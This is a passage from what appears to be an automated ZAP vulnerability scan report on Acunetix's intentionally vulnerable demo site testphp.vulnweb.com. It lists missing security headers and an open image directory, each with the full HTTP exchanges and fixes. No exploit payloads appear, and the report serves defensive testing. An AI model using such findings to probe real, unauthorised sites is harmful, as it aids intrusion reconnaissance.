pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/sitemap.xml |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 225 bytes. |
GET http://testphp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 155 bytes. |
HTTP/1.1 404 Not Found
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html Content-Length: 153 Connection: keep-alive |
Response Body - size: 153 bytes. |
<html>
<head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.19.0</center> </body> </html> |
URL | http://testphp.vulnweb.com/cart.php |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 347 bytes. |
POST http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/product.php?pic=1 Content-Length: 19 |
Request Body - size: 19 bytes. |
price=500&addcart=1
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4903 |
Response Body - size: 4,903 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>you cart</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Error</h2> <div class='story'> <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 348 bytes. |
POST http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/guestbook.php Content-Length: 33 |
Request Body - size: 33 bytes. |
name=ZAP&text=&submit=add+message
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5393 |
Response Body - size: 5,393 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong>ZAP</strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/search.php?test=query |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 342 bytes. |
POST http://testphp.vulnweb.com/search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Content-Length: 25 |
Request Body - size: 25 bytes. |
searchFor=ZAP&goButton=go
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:51 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4772 |
Response Body - size: 4,772 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>search</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>searched for: ZAP</h2></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 351 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/signup.php Content-Length: 96 |
Request Body - size: 96 bytes. |
uuname=ZAP&upass=ZAP&upass2=ZAP&urname=ZAP&ucc=ZAP&uemail=ZAP&uphone=ZAP&uaddress=&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 733 |
Response Body - size: 733 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: ZAP</li><li>Password: ZAP</li><li>Name: ZAP</li><li>Address: </li><li>E-Mail: ZAP</li><li>Phone number: ZAP</li><li>Credit card: ZAP</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
Instances | 47 |
Solution |
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header, to achieve optimal browser support: "Content-Security-Policy" for Chrome 25+, Firefox 23+ and Safari 7+, "X-Content-Security-Policy" for Firefox 4.0+ and Internet Explorer 10+, and "X-WebKit-CSP" for Chrome 14+ and Safari 6+.
|
Reference |
https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html http://www.w3.org/TR/CSP/ http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html http://www.html5rocks.com/en/tutorials/security/content-security-policy/ http://caniuse.com/#feat=contentsecuritypolicy http://content-security-policy.com/ |
Tags |
OWASP_2021_A05
OWASP_2017_A06 |
CWE Id | 693 |
WASC Id | 15 |
Plugin Id | 10038 |
Medium |
Directory Browsing - Apache 2 |
---|---|
Description |
It is possible to view a listing of the directory contents. Directory listings may reveal hidden scripts, include files , backup source files, etc., which be accessed to reveal sensitive information. - Apache 2
|
URL | http://testphp.vulnweb.com/images/ |
Method | GET |
Parameter | |
Attack | |
Evidence | <title>Index of /images/</title> |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/images/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/images |
Request Body - size: 0 bytes. |
|
Response Header - size: 148 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:52 GMT Content-Type: text/html Connection: keep-alive Content-Length: 377 |
Response Body - size: 377 bytes. |
<html>
<head><title>Index of /images/</title></head> <body> <h1>Index of /images/</h1><hr><pre><a href="../">../</a> <a href="logo.gif">logo.gif</a> 11-May-2011 10:27 6660 <a href="remark.gif">remark.gif</a> 11-May-2011 10:27 79 </pre><hr></body> </html> |
Instances | 1 |
Solution |
Configure the web server to disable directory browsing.
|
Reference | https://cwe.mitre.org/data/definitions/548.html |
Tags |
OWASP_2021_A05
OWASP_2017_A06 |
CWE Id | 548 |
WASC Id | 16 |
Plugin Id | 10033 |
Medium |
Missing Anti-clickjacking Header |
---|---|
Description |
The response does not include either Content-Security-Policy with 'frame-ancestors' directive or X-Frame-Options to protect against 'ClickJacking' attacks.
|
URL | http://testphp.vulnweb.com |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 213 bytes. |
GET http://testphp.vulnweb.com HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 447 bytes. |
GET http://testphp.vulnweb.com/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:14:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a 